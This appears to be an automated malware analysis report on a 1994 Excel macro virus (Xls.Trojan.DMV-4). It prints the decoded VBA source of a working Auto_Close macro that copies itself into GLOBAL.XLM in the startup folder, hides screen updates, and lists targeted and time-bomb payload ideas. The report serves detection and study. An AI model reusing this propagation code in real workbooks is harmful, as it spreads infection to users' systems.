Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 daec39849d10397f…

MALICIOUS

Office (OLE)

61.0 KB Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 505bed7765b3628d1221f359eac7fa4e SHA-1: bf2469321f7035bb88b69073a6603d39fa3f0cde SHA-256: daec39849d10397ff6fb11776ee1b1c85f684c2c86d521fd31e3293948568f42
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Xls.Trojan.DMV-4. It contains VBA macros, specifically an Auto_Close macro designed to execute when Excel is closed. This macro attempts to infect the GLOBAL.XLM file by copying a module named 'Sheet01' into it, propagating the macro virus.

Heuristics 3

  • ClamAV: Xls.Trojan.DMV-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.DMV-4
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4320 bytes
SHA-256: 94f7cff5a4ac7b1a9599a64ec88d87837bd378c16652627d10b10f8bb8196e78
Detection
ClamAV: Xls.Trojan.DMV-4
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet01"

' Excel Auto_Close DMV
' 12/27/94 by joelm@eskimo.com
'
' This is a quick and dirty demonstration of a DMV running under
' Microsoft Excel 5.0.  It demonstrates the security risks of
' automatic macros.
'
' The code executes when Excel closes.  It infects the global macro file.
' No data files are infected, although it would be possible to add
' additional VBA code to do so (ala the Word DMV.DOC file).

Sub Auto_Close()
Attribute Auto_Close.VB_Description = "Macro recorded 12/27/94 by joelm"
Attribute Auto_Close.VB_ProcData.VB_Invoke_Func = " \n0"

'this is the virus propogation code that infects GLOBAL.XLM

'for testing if GLOBAL.XLM and virus are already present
globalPresent = 0
virusPresent = 0

'turn screen updating off so the results can't be seen by the user
Application.ScreenUpdating = False
For x = 1 To Application.Workbooks.Count
    'is a GLOBAL.XLM file present?
    If Application.Workbooks(x).Name = "GLOBAL.XLM" Then
        'it exists
        globalPresent = 1
        'now see if the macro virus has already been installed
        For y = 1 To Application.Workbooks("GLOBAL.XLM").Modules.Count
            'the module with the virus is given an innocent looking
            'name that blends in with the other sheets
            If Application.Workbooks("GLOBAL.XLM").Modules(y).Name = "Sheet01" Then
                virusPresent = 1
                MsgBox "Virus already installed in GLOBAL.XLM"
            End If
        Next
        
        'GLOBAL.XLM exists, but the virus hasn't been installed, so install
        'it from this file
        If virusPresent = 0 Then
            'make it visible - this is required before a copy
            Windows("GLOBAL.XLM").Visible = True
            'copy this module into it
            MsgBox "GLOBAL.XLM exists.  Adding Auto_Close virus to it."
            Application.Workbooks("DMV.XLS").Modules("Sheet01").Copy after:=Application.Workbooks("GLOBAL.XLM").Modules(1)
            'make it invisible again
            Windows("GLOBAL.XLM").Visible = False
            'save it
            Application.Workbooks("GLOBAL.XLM").Save
        End If
    End If
Next
    'GLOBAL.XLM doesn't exist, so create one and save macro to
    If globalPresent = 0 Then
        newname$ = ActiveWorkbook.Name
        MsgBox "GLOBAL.XLM doesn't exist.  Creating it now."
        'copy the module into the startup directory
        Application.Workbooks(newname$).SaveCopyAs Application.StartupPath + "\GLOBAL.XLM"
        'now we need to open it up and make it visible
        Application.Workbooks.Open (Application.StartupPath + "\GLOBAL.XLM")
        Windows("GLOBAL.XLM").Visible = False
        'save the change
        Application.Workbooks("GLOBAL.XLM").Save
    End If
    
'turn screen updating back on
Application.ScreenUpdating = True
    
MsgBox "The virus has been spread.  Now execute some other code, for example..."

'this is the code that executes after the virus is spread, some malicious
'examples that use simple VB properties are shown

orgName = Application.OrganizationName
MsgBox ("Just checked which organization Excel was registered to..." + Chr(10) + Chr(10) + "A DMV could selectively target a business, government agency, or organization.  For example, delete all files if this software was licensed to IBM.")

useName = Application.UserName
MsgBox "Just checked who Excel was registered to..." + Chr(10) + Chr(10) + "A DMV could selectively target a specific individual for revenge or eavesdropping."

theCountry = Application.International(xlCountryCode)
MsgBox "Just checked Excel's country code..." + Chr(10) + Chr(10) + "A DMV could selectively target users within a certain country.  For example, overwrite files if an Arabic version of Excel was running."

theDate = Date
MsgBox "Just checked the date..." + Chr(10) + Chr(10) + "A DMV could serve as a time bomb.  For example, start renaming files after September 1995, so it appears problems are related to the release of Microsoft
... (truncated)